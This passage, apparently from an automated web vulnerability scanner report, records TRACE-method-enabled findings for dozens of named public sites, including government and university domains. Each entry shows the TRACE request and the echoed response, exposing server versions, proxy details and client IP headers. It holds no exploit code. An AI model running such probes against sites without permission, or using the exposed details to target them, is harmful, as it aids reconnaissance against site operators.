Cookie: 2b5d3cb5932a22f9

Response

HTTP/1.0 200 OK
Server: Lotus-Domino
Date: Sat, 02 Apr 2011 11:20:18 GMT
Pragma: no-cache
Cache-Control: no-cache
Expires: Sat, 02 Apr 2011 11:20:18 GMT
Content-Type: message/http
Content-Length: 132
Connection: close

TRACE / HTTP/1.0
Host: www.sing365.com
Cookie: 2b5d3cb5932a22f9
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=172800

21.207. http://www.siteencore.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.siteencore.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.siteencore.com
Cookie: 10517938343ad66c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:28 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.siteencore.com
Cookie: 10517938343ad66c


21.208. http://www.smarter.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smarter.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smarter.com
Cookie: 3647e540a13dae24

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:07 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.smarter.com
Cookie: 3647e540a13dae24
Connection: Keep-Alive
rlnclientipaddr: 173.193.214.243


21.209. http://www.smileycentral.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.smileycentral.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.smileycentral.com
Cookie: d6340205efc7955c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:21 GMT
Server: Apache/1.3.27 (Unix) Resin/2.0.5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: d6340205efc7955c
Host: www.smileycentral.com
X-Jabodo-For: 173.193.214.243


21.210. http://www.snopes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.snopes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.snopes.com
Cookie: 3f182454063c316c

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 14:34:58 GMT
Content-Type: message/http
Content-Length: 68

TRACE / HTTP/1.0
Host: www.snopes.com
Cookie: 3f182454063c316c


21.211. http://www.socialsecurity.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.socialsecurity.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.socialsecurity.gov
Cookie: 28c7e3bab3c9d0fd

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:43:57 GMT
Cache-control: public
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.socialsecurity.gov
Cookie: 28c7e3bab3c9d0fd


21.212. http://www.soft82.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.soft82.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.soft82.com
Cookie: a252889f4e5511b8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:12 GMT
Server: Apache/1.3.42 (Unix) PHP/5.3.4 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: a252889f4e5511b8
Host: www.soft82.com


21.213. http://www.songlyrics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.songlyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.songlyrics.com
Cookie: 20cf55cc50e65d01

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:39:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.songlyrics.com
Cookie: 20cf55cc50e65d01


21.214. http://www.spanishdict.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.spanishdict.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.spanishdict.com
Cookie: ffa0285337569b7e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:41:49 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.spanishdict.com
Cookie: ffa0285337569b7e


21.215. http://www.squidoo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.squidoo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.squidoo.com
Cookie: 467f36368c93695d

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: message/http
Content-Length: 126
Date: Sat, 02 Apr 2011 12:44:00 GMT
X-Varnish: 1710142468
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Host: www.squidoo.com
Cookie: 467f36368c93695d
X-Forwarded-For: 173.193.214.243
X-Varnish: 1710142468


21.216. http://www.ssa.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ssa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ssa.gov
Cookie: 5d8921970ca185ec

Response

HTTP/1.1 200 OK
Server: Generic Web Server 1.0
Date: Sat, 02 Apr 2011 13:34:30 GMT
Cache-control: public
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: www.ssa.gov
Cookie: 5d8921970ca185ec


21.217. http://www.starpulse.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starpulse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.starpulse.com
Cookie: 854e1019a6cfdbcc

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:05 GMT
Server: Apache/2.2.15 (FreeBSD) PHP/5.3.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.starpulse.com
Cookie: 854e1019a6cfdbcc


21.218. http://www.steadyhealth.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.steadyhealth.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.steadyhealth.com
Cookie: ea78eff618711338

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.steadyhealth.com
Cookie: ea78eff618711338


21.219. http://www.stlyrics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stlyrics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stlyrics.com
Cookie: 6e1901f6f6372201

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:06:34 GMT
Server: Apache/2.0.55
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stlyrics.com
Cookie: 6e1901f6f6372201


21.220. http://www.stumbleupon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 9865fc5089468fbf

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 177
Date: Sat, 02 Apr 2011 12:38:08 GMT
X-Varnish: 996708376
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 9865fc5089468fbf
X-Forwarded-For: 173.193.214.243
host: www.stumbleupon.com
X-Pool-Chosen: default
X-Varnish: 996708376
Connection: keep-alive


21.221. http://www.stylelist.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stylelist.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stylelist.com
Cookie: 66cf114472725996

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:40 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.stylelist.com
Cookie: 66cf114472725996
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:27:E1A2:200483,x-lb-client-ip:ajg_u


21.222. http://www.suite101.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suite101.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.suite101.com
Cookie: 89984e8a11408d45

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:43 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 JRun/4.0
Connection: close
Content-Type: message/http
Set-Cookie: Coyote-2-455a6255=455a625b:0; expires=Sat, 02-Apr-11 13:01:40 GMT; path=/

TRACE / HTTP/1.0
Host: www.suite101.com
Cookie: 89984e8a11408d45


21.223. http://www.suntimes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.suntimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.suntimes.com
Cookie: 82cc3576990e3f0d

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:49 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http
Set-Cookie: SUNT=SUNT_ECP14; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.suntimes.com
Cookie: 82cc3576990e3f0d
X-Forwarded-For: 173.193.214.243


21.224. http://www.superiorpics.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.superiorpics.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.superiorpics.com
Cookie: 14c9478ac982aac5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:40 GMT
Server: Apache/1.3.41 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 14c9478ac982aac5
Host: www.superiorpics.com


21.225. http://www.tagged.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tagged.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 40e756b428f5692e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:08 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tagged.com
Cookie: 40e756b428f5692e
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


21.226. http://www.talkingpointsmemo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.talkingpointsmemo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.talkingpointsmemo.com
Cookie: 5893ada3a2267741

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Content-Type: message/http
Date: Sat, 02 Apr 2011 13:51:51 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-For: 173.193.214.243
Host: www.talkingpointsmemo.com
Cookie: 5893ada3a2267741
Connection: Keep-Alive


21.227. http://www.tarot.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tarot.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tarot.com
Cookie: dc075948a58f07f6

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:57 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.5 mod_ssl/2.2.8 OpenSSL/0.9.7a
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tarot.com
Cookie: dc075948a58f07f6


21.228. http://www.tastebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tastebook.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tastebook.com
Cookie: f42aa521c303ad57

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tastebook.com
Cookie: f42aa521c303ad57
X-Forwarded-Proto: http
X-Forwarded-For: 173.193.214.243


21.229. http://www.terra.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.terra.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 62c143e7fb21f41c

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:43 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.terra.com
Cookie: 62c143e7fb21f41c


21.230. http://www.theepochtimes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theepochtimes.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.theepochtimes.com
Cookie: 4152cd4d530380f5

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:24 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.theepochtimes.com
Cookie: 4152cd4d530380f5
X-Varnish: 191880439
X-Forwarded-for: 173.193.214.243


21.231. http://www.thefind.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thefind.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thefind.com
Cookie: 80f27d329c0af183

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:09 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thefind.com
Cookie: 80f27d329c0af183


21.232. http://www.theglobeandmail.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.theglobeandmail.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.theglobeandmail.com
Cookie: 8302653af291e481

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Ubuntu) Resin/3.1.8
Content-Type: message/http
Content-Length: 130
Date: Sat, 02 Apr 2011 13:56:22 GMT
X-Varnish: 744761711
Age: 0
Via: 1.1 varnish
Connection: close
Set-Cookie: BIGipServerEceweb=402840586.20736.0000; path=/

TRACE / HTTP/1.0
Host: www.theglobeandmail.com
Cookie: 8302653af291e481
X-Forwarded-For: 70.64.112.55
X-Varnish: 744761711


21.233. http://www.thegrids.info/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thegrids.info
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thegrids.info
Cookie: d78b879c1b680e97

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:37 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thegrids.info
Cookie: d78b879c1b680e97


21.234. http://www.thehollywoodgossip.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thehollywoodgossip.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thehollywoodgossip.com
Cookie: 928ee341bfd3816b

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:04 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:04 GMT
Vary: Cookie
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thehollywoodgossip.com
Cookie: 928ee341bfd3816b


21.235. http://www.thomasnet.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thomasnet.com
Cookie: a6777426af8f0c04

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:01 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thomasnet.com
Cookie: a6777426af8f0c04


21.236. http://www.timeanddate.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.timeanddate.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.timeanddate.com
Cookie: 922db769262c0813

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:59 GMT
Server: Apache/2.0.63
Content-Type: message/http
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

TRACE / HTTP/1.1
Host: www.timeanddate.com
Cookie: 922db769262c0813
Accept-Encoding: gzip
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243
x-chpd-loop: 1
Via: 1.0 PXY005-ASHB.COTENDO.NET (chpd/3.06.0052)


21.237. http://www.tmz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: 9b2719aa7bddf242

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:43:29 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: 9b2719aa7bddf242
X-Forwarded-For: 173.193.214.243


21.238. http://www.tomshardware.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tomshardware.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tomshardware.com
Cookie: 8e14e657507cb9ab

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:38:59 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from proxy-us1.bsocom.net
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
Connection: close

TRACE / HTTP/1.0
Host: www.tomshardware.com
Cookie: 8e14e657507cb9ab
Via: 1.0 proxy-us1.bsocom.net:80 (squid/2.6.STABLE16)
X-Forwarded-For: 173.193.214.243
Cache-Control: max-age=0


21.239. http://www.toptenreviews.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.toptenreviews.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.toptenreviews.com
Cookie: f98c66531054e4d8

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:38 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.toptenreviews.com
Cookie: f98c66531054e4d8


21.240. http://www.tradekey.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tradekey.com
Cookie: a203086ed768691f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:06 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.tradekey.com
Cookie: a203086ed768691f


21.241. http://www.travelpod.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.travelpod.com
Cookie: ab4a451b8fa83901

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:10:10 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.travelpod.com
Cookie: ab4a451b8fa83901


21.242. http://www.truste.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.truste.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.truste.com
Cookie: c26c78965d384e64

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:07 GMT
Server: Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.truste.com
Cookie: c26c78965d384e64


21.243. http://www.twitlonger.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.twitlonger.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.twitlonger.com
Cookie: 680bdebd5902d2ac

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:40 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.twitlonger.com
Cookie: 680bdebd5902d2ac


21.244. http://www.ucomparehealthcare.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ucomparehealthcare.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ucomparehealthcare.com
Cookie: c72e712f30cc81e3

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:07 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ucomparehealthcare.com
Cookie: c72e712f30cc81e3
Connection: Keep-Alive
CIPA: 173.193.214.243


21.245. http://www.ufl.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ufl.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ufl.edu
Cookie: eb0ede8290745121

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:02 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ufl.edu
Cookie: eb0ede8290745121


21.246. http://www.use.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.use.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.use.com
Cookie: 99a22e438a5c7d80

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:20 GMT
Server: Apache/2.2.9 (Fedora)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.use.com
Cookie: 99a22e438a5c7d80


21.247. http://www.usgs.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.usgs.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.usgs.gov
Cookie: 4492d1bf428440ea

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 13:45:32 GMT
Content-Type: message/http
Content-Length: 99
Expires: Sat, 02 Apr 2011 13:45:32 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.usgs.gov
Cookie: 4492d1bf428440ea
_FP_X_URL: http://www.usgs.gov/


21.248. http://www.utube.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.utube.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.utube.com
Cookie: 10e916fe84ed360a

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.utube.com
Cookie: 10e916fe84ed360a


21.249. http://www.veoh.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.veoh.com
Cookie: 87af5ed549619bac

Response

HTTP/1.1 200 OK
Set-Cookie: veohCookie="VisitorUID=BFCBC25C-4061-BC23-C8DE-541EF30FEA67&LastUpdate=02/Apr/2011:06:34:14 -0700&first=0"; domain=.veoh.com; Expires=Wed, 01 Apr 2015 13:34:14 GMT; Path=/
Date: Sat, 02 Apr 2011 13:34:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
Content-Type: message/http

TRACE / HTTP/1.0
X-VEOH_TSTAMP: 1301751254773
Cookie: 87af5ed549619bac; veohCookie="VisitorUID=BFCBC25C-4061-BC23-C8DE-541EF30FEA67&LastUpdate=02/Apr/2011:06:34:14 -0700&first=1"
CLIENT_IP: 173.193.214.243
X-Cluster-Client-Ip: 173.193.214.243
Connection: Keep-Alive
H
...[SNIP]...

21.250. http://www.vimeo.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vimeo.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vimeo.com
Cookie: f8cbbb405e0f663e

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:22 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vimeo.com
Cookie: f8cbbb405e0f663e
X-Jabodo-For: 173.193.214.243


21.251. http://www.vitals.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vitals.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.vitals.com
Cookie: 9fb44a2b27e0c0cd

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:09 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.vitals.com
Cookie: 9fb44a2b27e0c0cd


21.252. http://www.wa.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wa.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wa.gov
Cookie: 4123a1a2673f99ca

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:42:28 GMT
Server: Apache/2.2.3 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wa.gov
Cookie: 4123a1a2673f99ca


21.253. http://www.walletpop.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.walletpop.com
Cookie: aa8ab9a9da412c5f

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:28 GMT
Server: Apache/2.2
Vary: Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.walletpop.com
Cookie: aa8ab9a9da412c5f
Connection: Keep-Alive
X-LB-Client-IP: 173.193.214.243
X-Forwarded-For: 173.193.214.243
X-CHAD: 6:1:17:622B:200483,x-lb-client-ip:ajg_u


21.254. http://www.wapedia.mobi/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wapedia.mobi
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wapedia.mobi
Cookie: c62c5f12794df102

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:43 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.wapedia.mobi
Cookie: c62c5f12794df102
X-Varnish: 1919134896
X-Forwarded-For: 173.193.214.243


21.255. http://www.washington.edu/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www.washington.edu
Cookie: 4c08f685915b2ae9

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.washington.edu
Cookie: 4c08f685915b2ae9


21.256. http://www.weather.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weather.com
Cookie: 154b5158c028b571

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 02 Apr 2011 12:37:29 GMT
Content-Type: message/http
Content-Length: 105
Expires: Sat, 02 Apr 2011 12:37:29 GMT
Connection: close

TRACE / HTTP/1.0
Host: www.weather.com
Cookie: 154b5158c028b571
_FP_X_URL: http://www.weather.com/


21.257. http://www.weather.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.gov
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weather.gov
Cookie: 3608eaf25677bf52

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:29:41 GMT
Content-Type: message/http
Server: Apache
Via: 1.1 nws-hq-cache03 (NetCache NetApp/6.0.7)

TRACE / HTTP/1.1
Host: www.weather.gov
Cookie: 3608eaf25677bf52
X-Forwarded-For: 173.193.214.243
Via: 1.0 nws-hq-cache03 (NetCache NetApp/6.0.7)


21.258. http://www.weatherbug.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weatherbug.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weatherbug.com
Cookie: ab3f21f7ce2f030d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 02 Apr 2011 12:44:05 GMT
P3P: CP="NOI DSP COR NID TAI STP UNI"
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 72

TRACE / HTTP/1.0
Host: www.weatherbug.com
Cookie: ab3f21f7ce2f030d


21.259. http://www.webring.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.webring.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.webring.org
Cookie: 3b5ff0e9cef6ced2

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:39 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.webring.org
Cookie: 3b5ff0e9cef6ced2


21.260. http://www.weebly.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weebly.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.weebly.com
Cookie: c95a93806fa92813

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:19 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.weebly.com
Cookie: c95a93806fa92813


21.261. http://www.wendys.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wendys.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wendys.com
Cookie: 85ef312f1efd68e1

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:21:04 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: BIGipServerpool-x-www.wendys.com=784924426.4391.0000; path=/

TRACE / HTTP/1.0
Host: www.wendys.com
Cookie: 85ef312f1efd68e1
X-Forwarded-For: 173.193.214.243


21.262. http://www.wikimedia.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wikimedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: www.wikimedia.org
Cookie: 3ef0004212ec6ed

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:45 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq61.wikimedia.org
X-Cache-Lookup: NONE from sq61.wikimedia.org:3128
